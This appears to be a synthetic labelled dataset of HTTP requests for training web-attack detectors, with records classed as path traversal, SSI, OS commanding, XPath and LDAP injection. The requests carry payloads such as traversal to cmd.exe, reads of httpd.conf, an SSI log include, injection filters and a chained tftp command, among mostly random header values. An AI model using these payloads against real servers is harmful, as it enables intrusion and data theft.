Date: Tue, 23 Mar 04 17:00:40 GMT
ETag: "n-K9zdPmuBy1CV7jG"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 17 Nov 06 12:40:11 CET
If-Unmodified-Since: Sun, 26 Apr 09 09:30:08 CET
If-Match: *
If-None-Match: "IeMj1Omdm2OMC1BL6t"
If-Range: Mon, 28 Apr 08 22:17:01 CET
Max-Forwards: 8350
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: Digest qop=auth-int
Range: -2,4927-,7358-69
Referer: http://www.geAnimwe.com/sneu/oefip.exe
TE: trailers
Trailer: Accept-Charset
User-Agent: nddVoo7Rg http://www.gslalw.org
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 965x958
Via: 9.0 www.t33pa.tiff, oh3i6e/3.3 68.53.176.230
Transfer-Encoding: identity
Upgrade: odv/3.8, cye8/8.2
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48044
Start - Id: 44757
class: PathTransversal
GET /r0ynndd4r/yacusea/sbgC7q.asp?5cshjwhH9e0rsa=3565978&pernnooden=6972248&de=file%3A%2F%2F%2Fr%3A%2Fiyy0%2Fenusn%2Fpedu5mwe.xml&Tdoe82sh7=aR&erua=45860665&isoaadntNsea=r5jxGgIsZb2&vvltmpr=sofae8fe7sa&uiut=x%27 HTTP/1.1
Host: www.Alitnhjfw.biz:327
Connection: bwRoxl
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: sjs2-nc, et-daleo
Cache-Control: no-store
Client-ip: 245.254.197.131
Cookie: ozoaa=6iH9BoQD;jpv1huee=igx@;ia=fetcifobidivsr+\u
Cookie2: $Version="28"
Date: Mon, 02 Jun 08 16:57:46 GMT
ETag: W/"xb-ZO.Nm0QQKMM6"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Thu, 15 Apr 04 13:45:47 CET
If-Unmodified-Since: Fri, 13 Nov 09 11:51:37 CET
If-Match: "Al_M2p86uSFudm_HScc-"
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 6
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 484-6716,4-82,-34
Referer: /Ee2NM/fuoeN.php3
TE: chunked;q=0.4
Trailer: TE
User-Agent: 6oszh (ag0VYsi)
UA-CPU: x86
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 6.4 212.103.232.30, fir/7.4 www.8nyllt7r.png, 9.4 www.eocwyseg.shtml
Transfer-Encoding: cdeup1
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 707 233.213.218.176:22416 "2pjtanyoNbt" "Mon, 22 Mar 10 21:57:09 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44757
Start - Id: 39839
class: SSI
POST /ge/ngrtawrsdeuc0ahiue/4Ts7wPQyRzzJ0/hhwlzie/andzx6_ihEW7k42M/ey0lXv/aeCymPsqaa9bAsisoes.png? HTTP/1.0
Content-Length: 56
Content-Language: pd,ihIh4h
Content-Encoding: deflate
Content-MD5: c1d0ZWV0dHd4RGJhcjRQcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Feb 09 11:45:32 GMT
Host: www.tn74igCyj.gov
Connection: close
Accept: application/postscript;q=0.1, text/html;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: <!--#include     virtual="/var/log/httpd/access.log"-->
Accept-Language: *
Cache-Control: no-transform
Cookie: hs4ee=moo;rtderisss1=bDTeWL90;oZ5dStsmoua=h9n;sala=Hke26ttrc2ecTadest;wgetyexec3ie1Ixw=fwre5 )eobject;eEhefdow=isedutcbs3dpuo
Cookie2: $Version="6"
Date: Mon, 06 Aug 07 18:35:38 UTC
Expect: 100-continue
If-Modified-Since: Thu, 21 Aug 08 05:58:52 GMT
If-Unmodified-Since: Thu, 10 May 07 12:09:43 GMT
If-Match: "0GVQueIJ48YV3v4g"
If-None-Match: "0s5RbJ3rOYgp_xB4KnOm"
If-Range: "Og3bhzHY.cHjIajQyfq"
Max-Forwards: 6
Pragma: no-cache
Authorization: NTLM SG5lbzdzMW5hdG9ub3N0bHRmTDMxNmVtZ2x0c2k0Y2FlZXNvaQ==
Referer: http://www.fni2i.cz/saIj3amn/tEna6/4r5ot.asp
User-Agent: hgNsy3tkI http://www.u7etcn.gov
UA-Color: color32
UA-Pixels: 769x5437
Via: hugdnx/4.9 www.ntiql.png
Transfer-Encoding: compress
----: -------------------------------------------

dWrEicnvpNrt=trweee&ohotsh=iqa9rhOw1dm&siheallylce=0xt11

End - Id: 39839
Start - Id: 46282
class: PathTransversal
GET /ncjpLiseiberloshrodf/mesoez0terz/tGvmQLtmBHxD_Qr/axap/i4q7LZf0O-skeV4Za/himK7/r0/7nenlu.bin?wnautioi=mTot8h&seiaehjum=a0au_cM&HrkWZmail=rp%29h&Itd07shndRond=iheroahtw5Itat&ieW7oeiiB8B=02&DIa5elCVboot.iniUw=cdn+%27-e&DpassthrumMyL-0s_MV=143&nafnfeg=elz7iulezuoC&oe=002&scriptFjMJZlibU=h%28%3BgAwHswtum&yShOimetc=sock_streamx%3Dhttps%3Ea3TeCrtkbw%3E+e&bm=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FRf2u.conf&sUms0cou=940&Ep=yL3otlrcuzjGeoofv HTTP/1.1
Host: www.Dar4iiremv.uk
Connection: keep-alive
Accept: text/plain;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=9513
Client-ip: 131.126.28.0
Cookie: 4dQ=y2H4retigxeobtyism;9qaccess_logBDxmljandxp_=ectuel3rsse4msyhaq;4nlstiwIl=cconnectis;dnoeaher8=sot8tEh;6a8m=ubs6_x63d0NO
Cookie2: $Version="52"
Date: Tue, 13 Oct 09 08:57:19 CET
ETag: "qTKDkaKodzPSVS8-"
Expect: 100-continue
From: 99enm@dnee.org
If-Modified-Since: Sat, 22 Dec 07 04:05:53 UTC
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "brpk6iGhZ@Eq7W6cn"
If-None-Match: "ADv5vXCPlEfadxCR"
If-Range: "F2AXr@tKv_gxtA4KF"
Max-Forwards: 1953
MIME-Version: 8.9
Pragma: un=MeaeHe1i
Proxy-Authorization: NTLM d29vc2FoY21qbE9uYW90ZW5jc2hzNnRpZWxvVGxPbjRlYWd0cjRl
Authorization: Basic ZXRyOUk6N2xtc2g=
Range: -99,17-4389
Referer: /ntpe/ndtsm.ace
TE: chunked,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: tcy6/7.6
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: eadaka/1.7 www.oehetsi.jpg
Transfer-Encoding: qrer
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 1060683
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46282
Start - Id: 43832
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.4egN.cz
Connection: close
Accept: audio/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, deflate, gzip
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 172.122.152.72
Cookie: 9a3epnq=63;d5etxlt=c)nE4passthruiframemhat1apDoaEA;eehtw1psatkoaui=22165;yih0un=0045697
Cookie2: $Version="567"
Date: Fri, 24 Aug 07 10:13:23 CET
ETag: "XjNn@14_sGqxnijJkTZ"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "j@5YzCedrakc5Y9"
If-None-Match: *
If-Range: "JJLnz_Jj8MknVuRPq"
Max-Forwards: 8
MIME-Version: 9.7
Pragma: hm1ismir=u0Hafm
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM bXllcm5qdDV1U2VkYXBkd2lwbXRlaGloYWFzNWR1bnQzag==
Range: 653-,494-99921,2-094773
Referer: /fmAi/rh4en/ds6Rmapr.pdf
TE: trailers,trailers
Trailer: Accept
User-Agent: fJOdT.evR http://www.Ryij.st
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: 9.8 4.246.171.36
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 396755923911
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43832
Start - Id: 50003
class: XPathInjection
POST /tF1A@TMFZ5x.yWHOC/9oWmhnfFa0epaahd2e/P1eatoienyite/i5DtX_@k.eIBfXI/eabI.jpeg? HTTP/1.1
Content-Length: 168
Content-Language: 4nsn,esg
Content-Encoding: gzip
Content-Location: /t2sh/neheou/3tth.avi
Content-MD5: d3RldGVlYXRqZXIwZ2FheQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 10:50:29 GMT
Last-Modified: Sun, 24 Sep 06 12:02:30 GMT
Host: 139.241.93.183
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: trr'   or  E/oz/child::node()[processing-instruction()=6] or    '1Ye'=    '
Cache-Control: no-cache
Client-ip: 177.9.17.154
Cookie: eftf=e-RcYjT;eh5qdhibuzs=244309;hSnfutVuAenog6=tUF54RZ;mlGk7o=ugujMsnehnRti;poavB9Udaotroie=487
Cookie2: $Version="2"
Date: Mon, 16 Jul 07 07:28:03 CET
ETag: "uXS1_vLt9nQGzEKhQH"
Expect: SEeuet
From: etjd@onalE.be
If-Modified-Since: Sat, 13 Sep 08 20:10:55 GMT
If-Unmodified-Since: Sun, 17 Dec 06 22:06:44 CET
If-Match: "X_JEa3J6PrqCTWOqUg"
If-None-Match: *
If-Range: Mon, 09 Jun 08 14:22:46 CET
Max-Forwards: 37
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic YUJ1YTpBaXBlaQ==
Authorization: qetsi haat5=cptst
Range: 1-0902
Referer: /ehxDfjmi/ntdaae/roge/ilhLehse.pdf
TE: deflate
Trailer: Date
User-Agent: h9leiwa/4.7.8.6.7
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Win98
UA-Pixels: 957x1532
Via: FTP/4.2 www.NHwe.png
Transfer-Encoding: identity
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 930 www.EosRdrh.tiff "etleodlp" 
X-Serial-Number: 1430325
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

ha0swhabAt=aet31shhc&l8tyt2eaoAmf6=kjcoumz>ao&ayei=t4k&tbced46rnyain5=54&eutAd=3752&feqeannwrn=j2K&tsuocd46kfk44=gk3x80qM&neeeoiSdhnis=4zA5wsoe6&nnIwnqrjn=e0wXlZCsPoE

End - Id: 50003
Start - Id: 44586
class: OsCommanding
GET /rs/zergan/sntei4hTortn/TAUv5NnoNELrHJ5.css?0aj9PK-4hHvpN=427421&Drcjestthndefng=032&3dleehw=nF%40Vv6qfk&oaedt=3ahstlw+twe%5Cnode+eklt%24&wttrlatty=nkti%24hzlcsock_streamae%5Bn6&7cKoqfeSee=ioe+di&v2ohzsEceb2dmd=i0or&1F.8pfJfHBr=40.2.106.138+++%3B+tftp+192.168.10.33+test.txt&e9uqsno8=8%3D5i&senaeoIa=aoenht+ygnO&ieci=mmcDQ-&GeeteRtiI=196671&tttr=paj8&DEnltc=nim2itidsanz8ttXN HTTP/1.0
Host: 18.207.232.160
Connection: close
Accept: video/mpeg, text/*, image/png
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: egdae-tf, spRskt-R;q=0.2, lspej-eTmta, da9te-hi, eo-ioeeetJh;q=0.5
Cache-Control: H='terosjfc'
Client-ip: 2.90.133.61
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Fri, 21 Nov 08 15:28:02 UTC
ETag: "w78aexpupN8g9SbMEjW"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Tue, 05 Feb 08 20:15:52 GMT
If-Unmodified-Since: Sat, 26 Dec 09 17:17:22 CET
If-Match: *
If-None-Match: "F21_4ypxpXPebo-2"
If-Range: "7XI-iDNXu5Ygiy-XYr7"
Max-Forwards: 3511
MIME-Version: 0.9
Pragma: tcTa='pvqn5p'
Proxy-Authorization: NTLM NnN3c3JsZWkxb2VpZ2NheDhydHRsZXRpaWwxbG9vY3pGZWlk
Authorization: NTLM c2UxZGx0bHRzZW9lcFphNzIzZGlTaWlvcmFwdGlkYXN1bG10aTBFdXNEdA==
Range: -2578
Referer: http://AasadLau.gov/es5I5eyi/stht9te/nutaee/tcs8XRo7.pdf
TE: trailers,chunked;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.4 (X11; U; Open BSD i386 0.0; te-ic; rv:4.7.3) Gecko/73717400
UA-Color: color8
Via: HTTP/7.1 www.anelAe.jpeg, hguugm/0.1 www.twetRteu.png, HTTP/0.2 www.eryh.htm
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
Warning: 109 www.oqshO.css "sekiw5f" 
X-Forwarded-For: 84.212.52.145
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44586
Start - Id: 36708
class: OsCommanding
PUT /orseyae/d9wLVYbt8FH6OP/tdaSotlaT2/vehnnbmaoiiweGtwt/5hie6tcn3hmycm/erC@KCa0Kpp/7XZuOwmetalogs6fromWE/ofog.shtml? HTTP/1.0
Content-Length: 320
Content-Language: sarl,iuossafn,au4Nrenp
Content-Encoding: gzip
Content-Location: http://www.0etm.gov/Hciit/e8Eajr/hlrt/e1neCo.pdf
Content-MD5: dGRlb2RpMjIyZWhlcHR0RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 May 05 02:24:07 UTC
Last-Modified: Thu, 01 Feb 07 08:19:32 GMT
Host: www.dArrtoin.net
Connection: ee7ikno
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.1, compress;q=0.9, identity
Accept-Language: a-ps, dq-r
Cache-Control: no-transform
Client-ip: 24.6.250.56
Cookie: wustoEiriseaWR=8;baofbeeSthq3E=e5nurnsvcorp;hs4s6ure0rsezrn=miaenur;lln5b=lNluossJyekz
Cookie2: $Version="029"
Date: Tue, 31 Oct 06 01:09:18 CET
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: ihu8
From: eralt@eApeeioers.de
If-Modified-Since: Tue, 08 Jun 04 08:27:00 CET
If-Unmodified-Since: Mon, 24 Sep 07 15:44:56 GMT
If-Match: *
If-None-Match: "r9M_gIUh-jKg3lHOmA"
If-Range: Tue, 09 Feb 10 24:01:39 UTC
Max-Forwards: 5
MIME-Version: 4.5
Pragma: i3=lw1n
Proxy-Authorization: ssrr uentet=otetm
Authorization: Basic TmJzVGRzOmVrcW9weWU=
Range: 426198-
Referer: http://porpso.biz/l1DtYl/sx6bcr.dll
TE: chunked;q=0.4
Trailer: Pragma
User-Agent: Mozilla/4.3 (compatible; MSIE 2.7; Mac OS X; neaaaeop; sgSrI; waaNptFcnt)
UA-CPU: 68000
UA-Disp: 1584,454,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 654x545
Via: 2.8 www.yar0.shtml
Transfer-Encoding: identity
Upgrade: omsr/2.0, rxspop/7.7, osEh/6.9
X-Forwarded-For: 3.19.153.226
X-Serial-Number: 56753790065108318
----: -------------------------

Oce8oudotR=et rTov&rdh=asnL\ umselect7%'&arhnioa=7&resbucihr=mail CgetdEepx@y5entt.dbuyqAg.gov <<    /tmp/wu.c   ;&legneszTf=s2WmHpTR&pihntocseesy=hr&pebse9srDtnli7=lj_VOpA2_&siesg25oe5nas= ylHnatU@ep&mZowaha=943572&diEhsEwbtcy3ttu=01585578&ziath=7931049&oemtsTcm07=t;ene4insertconnect]1d&httI=eb

End - Id: 36708
Start - Id: 36314
class: PathTransversal
GET /d7TS0mIkY0lg2TP0L7hg/e4gbPt7xd1EbtUK/seCT/1eeenbfe1eees8arHt/vIliFySI_6Nh/iao/ebhmnIiqWheensShc.js?ZKVGWraccess_log7=7&rmn0=%2Fetc%2Fhttpd%2Fhttpd.conf&i1pdeer=9647 HTTP/1.1
Host: www.i7isn.fr
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fecm-n;q=0.1, iaE54Rls-9ie, 8oiSelir-by;q=0.4, t-e0ewt;q=0.6, es-w
Cache-Control: oea=ag
Client-ip: 204.44.253.203
Cookie: etaAsstzE=ltwinntame;5ts0enTts=149831731;n5ooopO6ahs=2416;noe=oprocessing-instructiontwamochaaeK|oc/x;rht=hjeoemev
Cookie2: $Version="628"
Date: Fri, 04 Dec 09 02:50:59 UTC
ETag: "PR@C.gH8sSbya5og"
Expect: 4soo
From: 5ygo@eiccrasaq.org
If-Modified-Since: Wed, 02 Apr 08 12:47:33 CET
If-Unmodified-Since: Tue, 25 Sep 07 11:54:58 CET
If-Match: "Ftkxf1q3c9V.rL-7"
If-None-Match: *
If-Range: Sun, 17 Jun 07 01:12:05 CET
Max-Forwards: 72
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: tioya ejsnoe=rrNti
Authorization: Basic YXRmMWllOnNocnRmNG4=
Range: -3
Referer: /ahWuen/lnQy/xFlnzo/atjsmee.js
TE: trailers
Trailer: User-Agent
User-Agent: f_wWTlzsB http://www.ltOM.de
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: 3.4 www.nwohR.png
Transfer-Encoding: identity
Upgrade: saanei/2.6
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36314
Start - Id: 49333
class: XPathInjection
GET /eS.Bpm/hABs0/eer09qkF5T@ErWek567.shtml?yo7=+mert&jdtaagatow7g=ouFBf_LfYVg&tsyE=jcrsakdn&ael=esh&xobwaris=kSrotAxeo4ggreosb&wag=PAes&zgpheaoe=t7he%27+++++or+++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+++i+%2B++j+++%2Bk+%2B+l++++%2B++1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27lEurv%27+%3D++++%27+UwpeeotN%27++or&HxWaWIgD.6=niacceptd&ol37aaid=iZv&v0kQXUe0vtunion=%5Dde++ HTTP/1.0
Host: 83.184.209.21
Connection: tsra9
Accept: */*;q=0.7
Accept-Charset: isiri-3342, iso-8859-9, windows-1250, windows-1251
Accept-Encoding: *
Accept-Language: I-iagwt;q=0.5
Cache-Control: min-fresh=503
Client-ip: 23.148.126.23
Cookie: c1BxYa8I=yt;tp1huepnajhZ9d=71699754;wPy_XCC1r=script7t+n?e-+aufh0 iwUe;s5onqr=a;_-iAOMDXWGPL=csalenmnmiat5link;kqn=bede4arTdstHs9
Cookie2: $Version="889"
Date: Tue, 10 Nov 09 09:27:24 CET
ETag: W/"FV.LajZ9oyTbHsHCIym"
Expect: Ialo
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Tue, 01 Aug 06 14:42:06 CET
If-Match: "t822JRwHWPmseRP9"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: "eY3sf-2Y.5AmHnm"
Max-Forwards: 76
MIME-Version: 6.3
Pragma: aeo9ae8=apectph
Proxy-Authorization: artrps eibl=2ExpiAa
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: http://tEOdAn.cz/cesxmeeb/tlMp/eulgnpa/rmre/0juigt.tiff
TE: trailers,gzip
Trailer: From
User-Agent: Mozilla/0.7 (Windows; U; WinNT 1.7; 9n-le; rv:3.3.8) Gecko/42619450
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: FTP/4.4 www.iti1ayd.css, iGdXh/7.0 124.254.183.149:7930
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 6608359
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49333
Start - Id: 37157
class: LdapInjection
GET /t1N-wHk92thGoPm/t8SEjSp3C_nvqnDEv3/hFr6Ddc6N518/_iFV5connectP/ooi/ensorznicfhs/ohLN60Mq@zAh/hnodeKQ8vX.gif?nk10nie5osIirma=4251&awa7lnullg5iio=iwxZxt6Cq5d&pnigig2e=41&aaRtyih=+ffromiPvaoenS8FnrL3&ntnur=tdieIofaeTa4tlsh&i2ca=agdElw&eongeoe=qiu%24r%5Ci3%5D&bjzsxcmoEhadl=13287502&Areged24YAa=hW5j&ZautoexecmWcrmu0j@V=4jyLnbetweene&ZJgABcA.o=Ioi%3Fe&lsnd=393%29%28%26%28objectClass%3Dca7%29%28%7C%28sn+%3D+wq%29%28cn%3Dr++++J*%29%29&to=r9504DteaH&execMxmscriptg.@vJdropo=neL&ljt=a%7C8torudT HTTP/1.0
Host: www.drtm.be:22784
Connection: dsxwRx
Accept: */*
Accept-Charset: euc-kr, iso-2022-jp;q=0.2, iso-8859-9;q=0.0, macintosh;q=0.4, windows-1250
Accept-Encoding: compress;q=0.5
Accept-Language: anpxle-nrtlZlaw;q=0.3
Cache-Control: max-age=4959
Client-ip: 159.233.41.170
Cookie: 9erm6c4K@h2=vbscript bin;3mUteewEae06m=0848415;hte=hddsl0
Cookie2: $Version="25"
Date: Sun, 03 Feb 08 13:09:36 CET
ETag: W/"tPQ1V2111a4tmCmWTe"
Expect: ltdttsO
From: tshrlW@hlaga0aBB1.de
If-Modified-Since: Wed, 27 Dec 06 20:41:04 UTC
If-Unmodified-Since: Sat, 09 Apr 05 04:56:03 CET
If-Match: "OiuWnPJhmeYYbgRSK"
If-None-Match: "vYThNU@fmW8EKJg"
If-Range: "0tws3ITxulaOK84XSM"
Max-Forwards: 278
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: reekt xebaTim=3oeser
Range: 183458-,10781-99705
Referer: /0vsmp/salg/euru.avi
TE: trailers
Trailer: Connection
User-Agent: ests0ieehh (wJlEcq5H2)
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5776x2501
Via: 8.9 14.107.103.111
Transfer-Encoding: identity
Upgrade: e9ojr/6.3
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 130460
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37157
Start - Id: 38581
class: LdapInjection
GET /gvYR/i_6.gif?rtpqSrlsnt8w=ix&At=%5D9&AS0eaDed=oEeir%29%28%26%28objectClass++%3D++++i4r*%29 HTTP/1.0
Host: 254.111.201.86:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, cp-932, iso-8859-6;q=0.3, gb2312;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=049
Client-ip: 231.216.109.79
Cookie: rK1R=68z04H-eW;diuhtxemw6AtaHu=sm;zQjl-=tr8qrrlh;iwayjpnnewlllo=91
Cookie2: $Version="6"
Date: Wed, 15 Feb 06 21:27:50 GMT
ETag: W/"INs.rY_u52VqhZ3fN"
Expect: 4zroesox
From: etac@sxisfet5in.ch
If-Modified-Since: Sat, 13 Nov 04 05:39:12 UTC
If-Unmodified-Since: Sat, 03 Apr 10 02:00:47 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 20:22:44 UTC
Max-Forwards: 4753
MIME-Version: 6.9
Pragma: 8='nesf'
Proxy-Authorization: Digest nc=862e2FDb
Authorization: Digest opaque="rseh"
Range: -5
Referer: /l4x2a/teg82r/terltph/7aDsaeS/ehtqeEE.cfm
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 0.8; od-pp; rv:7.2.4) Gecko/73773017
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7804x6342
Via: 5.8 www.ei7enr.js:19309, 9.4 www.e8ohswt.js
Transfer-Encoding: sTWCa; 9io8=RelT
Upgrade: ksu/7.2, ear/3.1
Warning: 767 180.228.227.71 "tniR" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38581
Start - Id: 44960
class: PathTransversal
GET /H.XOFe/rWTX6OE/pNGbIa/rj/sHi5@dNppQmc_2_mzg_W/5u.AfFm2Ms@HgySL/uhRatwsi2/av84epho/proh4ct/eendte9e0osotdlsot.shtml?dtmsz=esssast5aaIi&rmhoiloh=hz%28kc&jpc0telpr=ltaag1s6fmnrde9&nn1flehrtp=3381827871&sEdRTd=yyeh+a+&itor=9479492024&nnuiita5Ygtitr0=9431497&t2bN7lsRmdotua=doc%28++++file%3A%2F%2F%2Fc%3A%2Ferrc7%2Fuwtem.xml++++%29&2inl3KKKY.2=hezrsMoXohsnwtI HTTP/1.0
Host: www.2iaCg.com
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8;q=0.6, euc-jp;q=0.3, shift_jis
Accept-Encoding: identity;q=0.4, gzip, gzip, deflate;q=0.9
Accept-Language: re3tp-aO;q=0.5
Cache-Control: min-fresh=07891
Client-ip: 108.71.153.69
Cookie: btz=998;ri29itqihAelex=723979;eo=9;Nhr0doaddeseokn=8selreeesetssc
Cookie2: $Version="02"
Date: Sat, 03 May 08 13:04:45 UTC
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Thu, 29 Sep 05 11:41:28 UTC
If-Unmodified-Since: Sun, 30 Jan 05 12:40:37 CET
If-Match: *
If-None-Match: "sfeSHScfadv2-25T-S"
If-Range: *
Max-Forwards: 0186
MIME-Version: 1.3
Pragma: od8='u4Isryg'
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: /isshf/hlo7x/etEbh.bin
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 9.7; ta-Tt; rv:8.6.4) Gecko/52187272
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 298x509
Via: dSS/5.0 184.217.61.230:0321
Transfer-Encoding: identity
Upgrade: nsi/5.0
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44960
Start - Id: 43920
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ook3htyo.gov
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: se1wqsa-7nmlldb6, h6clog-diini, hla-steEi;q=0.4, ofwa-fonlqg
Cache-Control: no-store
Client-ip: 22.30.133.135
Cookie: ti8oldhg=ndq;oet0=6767318;mdgtpsu9=ongriGolibqis8ee
Cookie2: $Version="50"
Date: Thu, 19 May 05 08:23:03 UTC
ETag: W/"vie1Rh-65y4FyKK@u97g"
Expect: iahe=MeGsltt;ntEYm3e
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Thu, 27 Jan 05 17:52:30 GMT
If-Unmodified-Since: Wed, 25 Nov 09 19:38:05 UTC
If-Match: "wUYpfCXl6otd5uZX"
If-None-Match: *
If-Range: Sun, 17 Dec 06 16:19:22 CET
Max-Forwards: 25
